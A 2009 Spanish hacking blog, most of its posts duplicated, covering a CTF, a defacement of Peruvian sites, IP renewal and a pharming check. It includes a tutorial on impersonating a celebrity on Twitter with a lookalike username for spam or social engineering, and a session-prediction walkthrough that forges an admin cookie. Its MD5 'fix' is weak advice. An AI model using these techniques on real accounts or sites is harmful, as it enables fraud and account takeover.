Es una excelente opción los retos son fáciles yo se que ustedes pueden resolverlos, solo hace falta un poco de imaginación y si han leido todo el contenido de mi blog creo que pueden sacar como minimo 70 quizas 80 puntos y mas su conocimiento externo pues creo que pueden llegar a un buen nivel.


El torneo tiene muchos retos en el ámbito de la Informática no solo Seguridad, los retos son relativamente cheveres, divierten y te distraen en el caso de que estes todo el día metido en una misma cosa. lo recomiendo.


Ir a Codebit


Espero verlos ahí

Saludos
Dr.White

Torneo Codebit

Para ser Sincero prefiero la realidad a cualquier wargame ya que te da un margen de libertad en darte imaginación y pues sientes la obligación de resolver por ti solo en el caso que no sea wargame.

Pero hoy les voy a presentar uno muy bueno en especial si recien estamos empezando =)

CODEBIT.ORG


Es una excelente opción los retos son fáciles yo se que ustedes pueden resolverlos, solo hace falta un poco de imaginación y si han leido todo el contenido de mi blog creo que pueden sacar como minimo 70 quizas 80 puntos y mas su conocimiento externo pues creo que pueden llegar a un buen nivel.


El torneo tiene muchos retos en el ámbito de la Informática no solo Seguridad, los retos son relativamente cheveres, divierten y te distraen en el caso de que estes todo el día metido en una misma cosa. lo recomiendo.


Ir a Codebit


Espero verlos ahí

Saludos
Dr.White

domingo, 22 de noviembre de 2009

Robo de Identidad ---> Name CHK




Hoy les voy a enseñar la peligrosidad de pequeñas herramientas que van solas por el internet, hoy les hablaré en particular de una "NAMECHK" esta herramienta te permite ver si tu nombre esta en alguna red social para que la puedas registrar, ese es el proposito natural...

obviamente esta herramienta mas sirve en el caso de los nicks que usemos pero con nombres tambien podemos encontrar resultados, esta herramienta puede ser peligrosa por un simple motivo...Robo de Identidades...


En El Caso que les voy a mostrar ahora ya es muy difícil hacer un tipo de ataques como este pero se podría intentar basandonos en otro tipo de algoritmos lógicos...


Selena Gomez es una conocida Cantante Adolescente de estados unidos, ella usa facebook y si nosotros ponemos su nombre miren lo que nos da como resultado:




Como pueden ver en la parte de abajo nos lleva a http://www.facebook.com/selenagomez en el caso que demos click...

Pero que pasa...

Yo no quiero orientarme en este caso a Facebook sino a sitios como twitter en el cual es facil falsificar esto miren:






es la misma imagen de hace un rato ahora ese es el resultado si ponemos simplemente SelenaGomez pero ahora veamos lo que pasa si ponemos algo TAN parecido como Selena.Gomez





Como vemos twitter no lo pone como usado a diferencia de facebook ahora solo imaginense ponerse un twitter como http://www.twitter.com/selena.gomez yo creo que mas de uno se uniría a ustedes...


De esto hable en el limahack el robo de identidad de esta manera puede ser bastante grande, ustedes diran pero que pueden hacer si me uno, por medio de ustedes puden llegar a otra persona y a otra persona sucesivamente hasta llegar a una victima o simplemente yo quiero recolectar gente para hacer spam o publicidad y hago este tipo de cosas, crearme twitters falsos, hi5s falsos, inclusive podemos hacer esto en facebook pero explicaré como en un siguiente tutorial...


Este tutorial lo hago ya que orientando de una buena manera esto lo podemos usar para un pentesting, quien sabe descibrir como se llama el hijo y poner el nombre como clave... muchos lo hacen...


Saludos
Dr.White

Robo de Identidad ---> Name CHK




Hoy les voy a enseñar la peligrosidad de pequeñas herramientas que van solas por el internet, hoy les hablaré en particular de una "NAMECHK" esta herramienta te permite ver si tu nombre esta en alguna red social para que la puedas registrar, ese es el proposito natural...

obviamente esta herramienta mas sirve en el caso de los nicks que usemos pero con nombres tambien podemos encontrar resultados, esta herramienta puede ser peligrosa por un simple motivo...Robo de Identidades...


En El Caso que les voy a mostrar ahora ya es muy difícil hacer un tipo de ataques como este pero se podría intentar basandonos en otro tipo de algoritmos lógicos...


Selena Gomez es una conocida Cantante Adolescente de estados unidos, ella usa facebook y si nosotros ponemos su nombre miren lo que nos da como resultado:




Como pueden ver en la parte de abajo nos lleva a http://www.facebook.com/selenagomez en el caso que demos click...

Pero que pasa...

Yo no quiero orientarme en este caso a Facebook sino a sitios como twitter en el cual es facil falsificar esto miren:






es la misma imagen de hace un rato ahora ese es el resultado si ponemos simplemente SelenaGomez pero ahora veamos lo que pasa si ponemos algo TAN parecido como Selena.Gomez





Como vemos twitter no lo pone como usado a diferencia de facebook ahora solo imaginense ponerse un twitter como http://www.twitter.com/selena.gomez yo creo que mas de uno se uniría a ustedes...


De esto hable en el limahack el robo de identidad de esta manera puede ser bastante grande, ustedes diran pero que pueden hacer si me uno, por medio de ustedes puden llegar a otra persona y a otra persona sucesivamente hasta llegar a una victima o simplemente yo quiero recolectar gente para hacer spam o publicidad y hago este tipo de cosas, crearme twitters falsos, hi5s falsos, inclusive podemos hacer esto en facebook pero explicaré como en un siguiente tutorial...


Este tutorial lo hago ya que orientando de una buena manera esto lo podemos usar para un pentesting, quien sabe descibrir como se llama el hijo y poner el nombre como clave... muchos lo hacen...


Saludos
Dr.White

sábado, 21 de noviembre de 2009

Peru Atacado!

Hoy Perú ha sufrido un ciber-ataque...

Algunas de las paginas defaceadas han sido:

http://thecars.com.pe/

http://www.peru.gob.pe/

http://ciberdocencia.gob.pe/


========================================


Da pena que webs de nuestro gobierno sean así de vulnerables habiendo tanto potencial en perú.

Y lo que si no me ha gustado son los mensajes agresivos de parte de los Black-Hat Chilenos...


Se me vienen muchas preguntas a la cabeza...

¿Ciber-Guerra?

¿Donde Está Elite-Peruvian?

¿Que Mierda tiene el gobierno en la cabeza?


EDITO: Para variar un grupo de fanáticos peruanos estan haciendo DOS o DDOS a la web del gobierno chileno...


Saludos
Dr.White

Peru Atacado!

Hoy Perú ha sufrido un ciber-ataque...

Algunas de las paginas defaceadas han sido:

http://thecars.com.pe/

http://www.peru.gob.pe/

http://ciberdocencia.gob.pe/


========================================


Da pena que webs de nuestro gobierno sean así de vulnerables habiendo tanto potencial en perú.

Y lo que si no me ha gustado son los mensajes agresivos de parte de los Black-Hat Chilenos...


Se me vienen muchas preguntas a la cabeza...

¿Ciber-Guerra?

¿Donde Está Elite-Peruvian?

¿Que Mierda tiene el gobierno en la cabeza?


EDITO: Para variar un grupo de fanáticos peruanos estan haciendo DOS o DDOS a la web del gobierno chileno...


Saludos
Dr.White

viernes, 20 de noviembre de 2009

PHP HACKS - EBOOK

Como ven esta semmana les he puesto mucho o mayor cantidad de lo normal de lo que es programación por que para saber de asegurar un CMS o un SOFTWARE tenemos que saber programar, no necesariamente ser expertos manejando matrices o arreglos pero si saber en nuestro caso que es CURL() SOCKETS y algunas cosas necesarias para poder hacer tests de penetración y para asegurar sistemas.


Hoy les quiero compartir un Excelente e-b00k que pues yo "me saco el sombrero" te enseña prácticas de programación no para un pentester pero te da una muy buena perspectica de como programar para un usuario final y esto combinado con sierto conocimiento de pentest pues quedaría muy bien...

Espero les guste este libro, te enseña a combinar configuraciones de XML con el PHP, te da buenas prácticas de programación este libro lo leí hace tiempo, como se han dado cuenta leo mucho, pero sinceramente esa es la forma de aprender leer y practicar les dejo este ebook que en mi parecer es genial.

Descarga de rapidshare


PD: me inspiré un poco jajaja

Saludos
Dr.White

PHP HACKS - EBOOK

Como ven esta semmana les he puesto mucho o mayor cantidad de lo normal de lo que es programación por que para saber de asegurar un CMS o un SOFTWARE tenemos que saber programar, no necesariamente ser expertos manejando matrices o arreglos pero si saber en nuestro caso que es CURL() SOCKETS y algunas cosas necesarias para poder hacer tests de penetración y para asegurar sistemas.


Hoy les quiero compartir un Excelente e-b00k que pues yo "me saco el sombrero" te enseña prácticas de programación no para un pentester pero te da una muy buena perspectica de como programar para un usuario final y esto combinado con sierto conocimiento de pentest pues quedaría muy bien...

Espero les guste este libro, te enseña a combinar configuraciones de XML con el PHP, te da buenas prácticas de programación este libro lo leí hace tiempo, como se han dado cuenta leo mucho, pero sinceramente esa es la forma de aprender leer y practicar les dejo este ebook que en mi parecer es genial.

Descarga de rapidshare


PD: me inspiré un poco jajaja

Saludos
Dr.White

Cambiemos nuestra IP

Bueno, hoy les voy a enseñar un truco que pues primero deben saber solo funciona con IPs Dinamicas, muy fácil vamos a nuestro escritorio (windows) y vamos a abrir un bloc de notas.

Dentro del Blog de notas Vamos a Escribir el siguien código:


cd/
cls
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit


Luego muy fácil lo guardamos como extención .bat con el nombre ip-change (el nombre puede cambiar como ustedes quieran lo mio era un ejemplo) luego simplemente tenemos que dar click derecho en nuestro escritorio poner actualizar e ir a una web como http://ip-adress.com y verificar que nuestra IP se ha renovado, esto es el mismo efecto que mucha gente consigue cuando apaga y prende su modem.

Espero esto les sriva, esto solo es cuando las ips son dinámicas no lo olviden.


Saludos
Dr.White

Cambiemos nuestra IP

Bueno, hoy les voy a enseñar un truco que pues primero deben saber solo funciona con IPs Dinamicas, muy fácil vamos a nuestro escritorio (windows) y vamos a abrir un bloc de notas.

Dentro del Blog de notas Vamos a Escribir el siguien código:


cd/
cls
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit


Luego muy fácil lo guardamos como extención .bat con el nombre ip-change (el nombre puede cambiar como ustedes quieran lo mio era un ejemplo) luego simplemente tenemos que dar click derecho en nuestro escritorio poner actualizar e ir a una web como http://ip-adress.com y verificar que nuestra IP se ha renovado, esto es el mismo efecto que mucha gente consigue cuando apaga y prende su modem.

Espero esto les sriva, esto solo es cuando las ips son dinámicas no lo olviden.


Saludos
Dr.White

jueves, 19 de noviembre de 2009

Ruby - Si queremos Programar el Metaspl0it

Para los que no sabían metaspl0it está programado en un lenguaje orientado a objetos conocido como RUBY, lo quize estudiar pero me ha gustado mucho el pyth0n y pues es difícil aprender muchos lenguajes a la ves así que me gustaría compartirles unos cuantos documentos de ruby para aquellos que quieren aprender este lenguaje, los documentos lo elejí por que creo que son buenos.


Ruby CookBook - Click Aquí


Creanme les da un amplio panorama del mundo del ruby, su funcionamiento y los enseña a relacionarlo con el html y el xml lo recomiendo.


Este Libro apenas lo voy a leer, es la segunda edición de un libro con el que aprendieron muchos conocidos mios aun no lo tengo en mi PC pero ahora lo descargo.

Click Aquí


Libro muy completo que te da una buena espectativa y funcionamiento de lo que es ruby este lo estoy leyendo o mejor dicho estaba hasta que comenze con el pyth0n.

Click Aquí o el PDF


Pueden buscar otros tutoriales en la red pero para darles una perspectiva profesional de lo que es ruby estos son sus ebooks.


Saludos
Dr.White

Ruby - Si queremos Programar el Metaspl0it

Para los que no sabían metaspl0it está programado en un lenguaje orientado a objetos conocido como RUBY, lo quize estudiar pero me ha gustado mucho el pyth0n y pues es difícil aprender muchos lenguajes a la ves así que me gustaría compartirles unos cuantos documentos de ruby para aquellos que quieren aprender este lenguaje, los documentos lo elejí por que creo que son buenos.


Ruby CookBook - Click Aquí


Creanme les da un amplio panorama del mundo del ruby, su funcionamiento y los enseña a relacionarlo con el html y el xml lo recomiendo.


Este Libro apenas lo voy a leer, es la segunda edición de un libro con el que aprendieron muchos conocidos mios aun no lo tengo en mi PC pero ahora lo descargo.

Click Aquí


Libro muy completo que te da una buena espectativa y funcionamiento de lo que es ruby este lo estoy leyendo o mejor dicho estaba hasta que comenze con el pyth0n.

Click Aquí o el PDF


Pueden buscar otros tutoriales en la red pero para darles una perspectiva profesional de lo que es ruby estos son sus ebooks.


Saludos
Dr.White

WinDump

Creo que todos alguna ves hemos escuchado del TCPDUMP, en el Simposio Internacional de Redes y comunicaciones de datos los de JackSecurity dieron una muy interesante charla sobre el TCP dump y su trabajo como sniffer y su habilidad para con packetes de la red poder ejecutar un Denial Of Service hacia una computadora de la red.


el WinDump es una versión del Sniffer para Windows, la necesidad me ha llevado a encontrar muchas buenas herramientas para windows y gratis, esta herramienta te permite ver los movimientos que hace tu red, sirve como t00l de administración también.


Esta utilidad necesida de otra para su funcionamiento, el WINPCAP, este es una especie de instalador para un propio funcionamiento del WINDUMP y/o TCPDUMP, masomenos son como requerimientos uno del otro.


Si desean probar la utilidad pues bienvenido.


Link de la web: http://www.winpcap.org

Link de Descarga del WINPCAP: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe

Link de Descarga del WINDUMP 3.9.5 (actual): http://www.winpcap.org/windump/install/bin/windump_3_9_5/WinDump.exe



No lo olviden para usar el WINDUMP necesitan el WINPCAP, espero les guste el programita recien estoy buscando manuales pero parece muy bueno, lo he probado en la red de un lugar ************** y funciona bien...


Saludos
Dr.White

WinDump

Creo que todos alguna ves hemos escuchado del TCPDUMP, en el Simposio Internacional de Redes y comunicaciones de datos los de JackSecurity dieron una muy interesante charla sobre el TCP dump y su trabajo como sniffer y su habilidad para con packetes de la red poder ejecutar un Denial Of Service hacia una computadora de la red.


el WinDump es una versión del Sniffer para Windows, la necesidad me ha llevado a encontrar muchas buenas herramientas para windows y gratis, esta herramienta te permite ver los movimientos que hace tu red, sirve como t00l de administración también.


Esta utilidad necesida de otra para su funcionamiento, el WINPCAP, este es una especie de instalador para un propio funcionamiento del WINDUMP y/o TCPDUMP, masomenos son como requerimientos uno del otro.


Si desean probar la utilidad pues bienvenido.


Link de la web: http://www.winpcap.org

Link de Descarga del WINPCAP: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe

Link de Descarga del WINDUMP 3.9.5 (actual): http://www.winpcap.org/windump/install/bin/windump_3_9_5/WinDump.exe



No lo olviden para usar el WINDUMP necesitan el WINPCAP, espero les guste el programita recien estoy buscando manuales pero parece muy bueno, lo he probado en la red de un lugar ************** y funciona bien...


Saludos
Dr.White

(IN)Secure Magazine 23 (En Ingles)



It's a Pleasure to make my first article in english it's just small but I want also foreing people to read the blog... hope you like the e-zine I've just started reading it but seems to be interesting.


Click here to go to the downloads page.


Waves'
Dr.White

(IN)Secure Magazine 23 (En Ingles)



It's a Pleasure to make my first article in english it's just small but I want also foreing people to read the blog... hope you like the e-zine I've just started reading it but seems to be interesting.


Click here to go to the downloads page.


Waves'
Dr.White

miércoles, 18 de noviembre de 2009

Metaspl0it 3.3 Actualizemos!!!

El Software de explotación de vulnerabilidades mas famoso del mundo ah Actualizado...


Despues de casi 1 año de estarlo programando la descarga ya está libre para ambos sistemas operativos Linux & Windows...


Link de Descarga


La entrada oficial en el blog de metaspl0it

Espero les guste yo ya lo tengo en mi pc tiene muchos expl0its nuevos en su base de datos...

Saludos
Dr.White

Metaspl0it 3.3 Actualizemos!!!

El Software de explotación de vulnerabilidades mas famoso del mundo ah Actualizado...


Despues de casi 1 año de estarlo programando la descarga ya está libre para ambos sistemas operativos Linux & Windows...


Link de Descarga


La entrada oficial en el blog de metaspl0it

Espero les guste yo ya lo tengo en mi pc tiene muchos expl0its nuevos en su base de datos...

Saludos
Dr.White

martes, 17 de noviembre de 2009

Verificar si somos victima de un ataque de Pharming

Pues estaba viendo un tutorial muy interesante de mi amigo perverths0 y pues se me ocurrió una forma simple de como saber si somos victimas de ataques de pharming...

bueno digamos que no sabemos como llegar al archivo hosts y tenemos problemas por que queremos entrar a la web de nuestro banco digamos http://bancodelperuyaliados.org.pe entonces pues tenemos miedo de entrar con nuestro user y pass por que no estamos seguros si tenemos un virus pharmer en nuestra PC asi que haremos lo siguiente.


Vamos a inicio>>Ejecutar>>CMD

nos aparecerá una imagen como esta:



Ahora nosotros vamos a escribir la siguiente linea:

ping bancodelperuyaliados.com

digamos que el resultado sea este:

Haciendo ping a bancodelperuyafiliados.com [10.0.0.0] con 32 bytes de datos:
Respuesta desde 10.0.0.0: bytes=32 tiempo=466ms TTL=51
Respuesta desde 10.0.0.0: bytes=32 tiempo=366ms TTL=51
Respuesta desde 10.0.0.0: bytes=32 tiempo=290ms TTL=51
Respuesta desde 10.0.0.0: bytes=32 tiempo=513ms TTL=51

Estadísticas de ping para 10.0.0.0:
Paquetes: enviados = 4, recibidos = 4, perdidos = 0
(0% perdidos),
Tiempos aproximados de ida y vuelta en milisegundos:
Mínimo = 290ms, Máximo = 513ms, Media = 408ms


10.0.0.0 --> ese numero debe de estar de una manera diferente un ejemplo no se 72.120.40.1 o quizas un numero X entonces nosotros diriamos a ok, ese numerito se llama IP como muchos ya deben saber ahora lo que haremos será ir a una web que de el servicio de hacer ping, la que yo uso:

http://ping.eu/

Ahora haremos ping pero con ese programa, si no nos sale la misma IP es que algo raro puede estar pasando, vamos a ir de nuevo a nuestra consola, CMD, ahora pondremos esto:

ipconfig /flushdns

ahora volvemos a hacer ping y si la IP que sale en la página es diferente a la que sale en tu PC probablemente estes siendo victima de un ataque de pharming.


Saludos
Dr.White

Verificar si somos victima de un ataque de Pharming

Pues estaba viendo un tutorial muy interesante de mi amigo perverths0 y pues se me ocurrió una forma simple de como saber si somos victimas de ataques de pharming...

bueno digamos que no sabemos como llegar al archivo hosts y tenemos problemas por que queremos entrar a la web de nuestro banco digamos http://bancodelperuyaliados.org.pe entonces pues tenemos miedo de entrar con nuestro user y pass por que no estamos seguros si tenemos un virus pharmer en nuestra PC asi que haremos lo siguiente.


Vamos a inicio>>Ejecutar>>CMD

nos aparecerá una imagen como esta:



Ahora nosotros vamos a escribir la siguiente linea:

ping bancodelperuyaliados.com

digamos que el resultado sea este:

Haciendo ping a bancodelperuyafiliados.com [10.0.0.0] con 32 bytes de datos:
Respuesta desde 10.0.0.0: bytes=32 tiempo=466ms TTL=51
Respuesta desde 10.0.0.0: bytes=32 tiempo=366ms TTL=51
Respuesta desde 10.0.0.0: bytes=32 tiempo=290ms TTL=51
Respuesta desde 10.0.0.0: bytes=32 tiempo=513ms TTL=51

Estadísticas de ping para 10.0.0.0:
Paquetes: enviados = 4, recibidos = 4, perdidos = 0
(0% perdidos),
Tiempos aproximados de ida y vuelta en milisegundos:
Mínimo = 290ms, Máximo = 513ms, Media = 408ms


10.0.0.0 --> ese numero debe de estar de una manera diferente un ejemplo no se 72.120.40.1 o quizas un numero X entonces nosotros diriamos a ok, ese numerito se llama IP como muchos ya deben saber ahora lo que haremos será ir a una web que de el servicio de hacer ping, la que yo uso:

http://ping.eu/

Ahora haremos ping pero con ese programa, si no nos sale la misma IP es que algo raro puede estar pasando, vamos a ir de nuevo a nuestra consola, CMD, ahora pondremos esto:

ipconfig /flushdns

ahora volvemos a hacer ping y si la IP que sale en la página es diferente a la que sale en tu PC probablemente estes siendo victima de un ataque de pharming.


Saludos
Dr.White

lunes, 16 de noviembre de 2009

PenTest: Session Prediction

Bueno previo de explicar como funciona quiero decirles que cuando las autentificaciones no están bien formuladas y nosotros obtenemos el cookie de una personas podriamos ponerlo y entraríamos como esa persona, según como lo hagamos se podría denominasr session fixation o cookie poisoning... ahora y eso que aquí la ponemos difícil miren las sigueinte cabecera:

Host: www.seguridadblanca.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
Cookie: PHPSESID=de2se1e95f0d01fd0efb8c66d5c1b7d0
Cache-Control: max-age=0


Bueno ahora ustedes lo ven normal ven todo parecido a sus headers si es que fuese real... pero hay algo que cambió

esta línea:

Cookie: PHPSESID=de2se1e95f0d01fd0efb8c66d5c1b7d0

En este caso la cookie está encriptada en MD5

Ahora si empesemos con una breve explicación de que cosa es el Session Prediction, aquí ustedes pueden apreciarlo encritpado en MD5 pero imaginense la siguiente situación, me registro en www.sitiox.com y mis datos son:

user: Camilo
pass: ju$tat3st


ahora imaginen que ya estamos en el index de la web queremos no se administrar nuestro perfil y pues se nos ocurre poner el live http headers y cuando vemos los headers vemos esto:


Host: www.sitiox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
Cookie: XSESID=camilositiox01
Cache-Control: max-age=0

vemos que la encriptación no está y la cookie que pasa con ella? mmm a ver la cookie segun lo que veo aquí es mi user + sitiox + 01 mmm veamos... nos salimos y creamos una cuenta en este caso los datos serán lo siguientes:

user: dedalo
pass: test2

y cuando volvemos a poner el live http headers vemos que dice esto:

Host: www.sitiox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
Cookie: XSESID=dedalositiox01
Cache-Control: max-age=0

hemos visto como es el algoritmo de creación ya lo tenemos resuelto... digamos que ahora usamos un amiguito en PHP o PERL que contenga unas lineas con SOCKETS o CURL y pues ponemos el algoritmo o si no hacemos un exploit creo que una opción para sacar entrar como admin sería cambiar nuestro XSESID por XSESID=nombredeladminsitiox01.

Digamos que el 01 fuese por el numero de dias que lleva el sitio en la red con ayuda de sitios como archive o whois podríamos encontrar maneras de saber cuantos dias lleva en la red o pues ya tocaría usar la iamginación para desifrar que tipo de algoritmo usó para hacer su sesión.


Fix?

Para reparar este error antes que todo deberíamos de agregarle un MD5() antes de mostrar sus cookies para evitar estos errores... ahora tambien deberíamos agregar una variable que diga que si el user y pass son correctos verifique la cookie como lo dije en el anterior tutorial de Argument injection


Espero hayan entendido ya que no me fue fácil explicar como funcionaba esto... espero les guste...


Saludos
Dr.White

PenTest: Session Prediction

Bueno previo de explicar como funciona quiero decirles que cuando las autentificaciones no están bien formuladas y nosotros obtenemos el cookie de una personas podriamos ponerlo y entraríamos como esa persona, según como lo hagamos se podría denominasr session fixation o cookie poisoning... ahora y eso que aquí la ponemos difícil miren las sigueinte cabecera:

Host: www.seguridadblanca.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
Cookie: PHPSESID=de2se1e95f0d01fd0efb8c66d5c1b7d0
Cache-Control: max-age=0


Bueno ahora ustedes lo ven normal ven todo parecido a sus headers si es que fuese real... pero hay algo que cambió

esta línea:

Cookie: PHPSESID=de2se1e95f0d01fd0efb8c66d5c1b7d0

En este caso la cookie está encriptada en MD5

Ahora si empesemos con una breve explicación de que cosa es el Session Prediction, aquí ustedes pueden apreciarlo encritpado en MD5 pero imaginense la siguiente situación, me registro en www.sitiox.com y mis datos son:

user: Camilo
pass: ju$tat3st


ahora imaginen que ya estamos en el index de la web queremos no se administrar nuestro perfil y pues se nos ocurre poner el live http headers y cuando vemos los headers vemos esto:


Host: www.sitiox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
Cookie: XSESID=camilositiox01
Cache-Control: max-age=0

vemos que la encriptación no está y la cookie que pasa con ella? mmm a ver la cookie segun lo que veo aquí es mi user + sitiox + 01 mmm veamos... nos salimos y creamos una cuenta en este caso los datos serán lo siguientes:

user: dedalo
pass: test2

y cuando volvemos a poner el live http headers vemos que dice esto:

Host: www.sitiox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
Cookie: XSESID=dedalositiox01
Cache-Control: max-age=0

hemos visto como es el algoritmo de creación ya lo tenemos resuelto... digamos que ahora usamos un amiguito en PHP o PERL que contenga unas lineas con SOCKETS o CURL y pues ponemos el algoritmo o si no hacemos un exploit creo que una opción para sacar entrar como admin sería cambiar nuestro XSESID por XSESID=nombredeladminsitiox01.

Digamos que el 01 fuese por el numero de dias que lleva el sitio en la red con ayuda de sitios como archive o whois podríamos encontrar maneras de saber cuantos dias lleva en la red o pues ya tocaría usar la iamginación para desifrar que tipo de algoritmo usó para hacer su sesión.


Fix?

Para reparar este error antes que todo deberíamos de agregarle un MD5() antes de mostrar sus cookies para evitar estos errores... ahora tambien deberíamos agregar una variable que diga que si el user y pass son correctos verifique la cookie como lo dije en el anterior tutorial de Argument injection


Espero hayan entendido ya que no me fue fácil explicar como funcionaba esto... espero les guste...


Saludos
Dr.White

Mas Flash Colegas...

Aquí les dejo otras presentaciones hechas por Wellington Villota Excelente en Flash, aquí una prsentacion que hizo... explica los tipos de animación, está muy buena.


Mas Flash Colegas...

Aquí les dejo otras presentaciones hechas por Wellington Villota Excelente en Flash, aquí una prsentacion que hizo... explica los tipos de animación, está muy buena.


domingo, 15 de noviembre de 2009

Mi Exposición de LimaHack - El Video

El Video de mi presentación en el LimaHack... espero lo disfruten aquellos que no lo pudieron ver en vivo.


Presentación de Camilo Galdos en LimaHack 2009 from Lima Hack on Vimeo.

Mi Exposición de LimaHack - El Video

El Video de mi presentación en el LimaHack... espero lo disfruten aquellos que no lo pudieron ver en vivo.


Presentación de Camilo Galdos en LimaHack 2009 from Lima Hack on Vimeo.

Cambiamos de Theme & Comentarios de Nuevo

Debido a que era muy oscuro el anterior theme... he decidido cambiarlo a uno mas claro y mas Clásico espero les guste...



Tambien ya pueden comentar de nuevo ;)espero comienzen a comentar de nuevo...


Saludos
Dr.White

Cambiamos de Theme & Comentarios de Nuevo

Debido a que era muy oscuro el anterior theme... he decidido cambiarlo a uno mas claro y mas Clásico espero les guste...



Tambien ya pueden comentar de nuevo ;)espero comienzen a comentar de nuevo...


Saludos
Dr.White

sábado, 14 de noviembre de 2009

Dominios .Tel

Bueno algunos de ustedes han de haber escuchado de estos dominios... la verdad pienso que son un poco inseguros por que con ayuda de unas lineas de code en PHP conseguí hacer un exploit para obtener la lista de todos los dominios que existen .tel estos dominios te vienen como con un pequeño hosting y pues puedes armas una página con themes desarrollados por ellos...

Aquí les dejo la lista de los dominios:

1-3goda.igrushki.tel 2009-05-10
1001-bijoux.tel 2009-04-24
12-18let.igrushki.tel 2009-04-24
12idn.ideegeo.tel 2009-04-29
13bank.tel 2009-04-03
13menu.tel 2009-04-03
1800tickets.tel 2009-04-03
1st.tel 2009-04-03
24-hour.alarmclock.tel 2009-05-10
2ai2.tel 2009-05-10
3ds.tel 2009-04-29
50cent.musicians.celebrity.tel 2009-04-15
5pointdesign.tel 2009-04-15
aaalockoutspecialist.tel 2009-04-29
aaargh.tel 2009-04-24
aalsmeer.netherlands.stage.tel 2009-05-10
aapl.tel 2009-04-24
abalorios.tel 2009-04-03
abandonware.tel 2009-04-15
abdullahgul.tel 2009-04-29
abidjan.africa.freetax.tel 2009-04-29
abkhazia.tel 2009-04-03
about.simonhelene.tel 2009-04-15
abr.tel 2009-04-03
abstractart.tel 2009-04-29
abteilungen.internetwire.tel 2009-04-24
accident.tel 2009-04-03
acciones.tel 2009-04-15
accordi.tel 2009-05-10
account.euroweb.tel 2009-05-10
accreditation-services.escapeartists.tel 2009-04-24
ace-consulting.tel 2009-04-24
acens.tel 2009-04-15
acorda.tel 2009-04-15
acsl-solicitors.accident.tel 2009-04-15
adamkillam.tel 2009-04-29
add-an-entry.promoting.tel 2009-05-10
address.yenaingsoe.tel 2009-04-24
addurl.tel 2009-04-15
adelaide.australia.oceania.travelagents.tel 2009-05-10
adele-gerdes.bielefeld.lektoren.tel 2009-05-10
adgrafics.tel 2009-04-24
adipopescu.tel 2009-04-15
administradoresdefincas.tel 2009-04-15
adobegold.tel 2009-05-10
adrian.tel 2009-04-03
ads-informatique.tel 2009-04-24
adult-dvd-explorer.dvds.pornos.tel 2009-04-24
advantage.wddx.tel 2009-04-24
adventor.tel 2009-04-29
advergaming.tel 2009-04-15
advertise.brighton.tel 2009-04-15
advice.investment.tel 2009-04-15
advisory.committees.noblenatl.tel 2009-05-10
advocates.tel 2009-04-03
adwordia.tel 2009-05-10
aeropuerto.tel 2009-05-10
aesthetics.tel 2009-04-15
affiliates.arthritis.pills.tel 2009-04-29
afghanistan.asia.cancel.tel 2009-05-10
africa.investment.tel 2009-04-15
africa.nestle.tel 2009-04-24
africa.other-offices.yourcompany.tel 2009-04-03
africa.travelagents.tel 2009-04-15
agadir.morocco.africa.other-offices.yourcompany.tel 2009-04-03
agashkina.logoped.tel 2009-05-10
agence-communication.tel 2009-04-24
agence-de-communication.tel 2009-04-24




Si quieren obtener la lista completa veanla en:

SendSpace
PasteBin


la web oficial de los dominios tel es:

http://www.telnic.org/


Saludos
Dr.White

Dominios .Tel

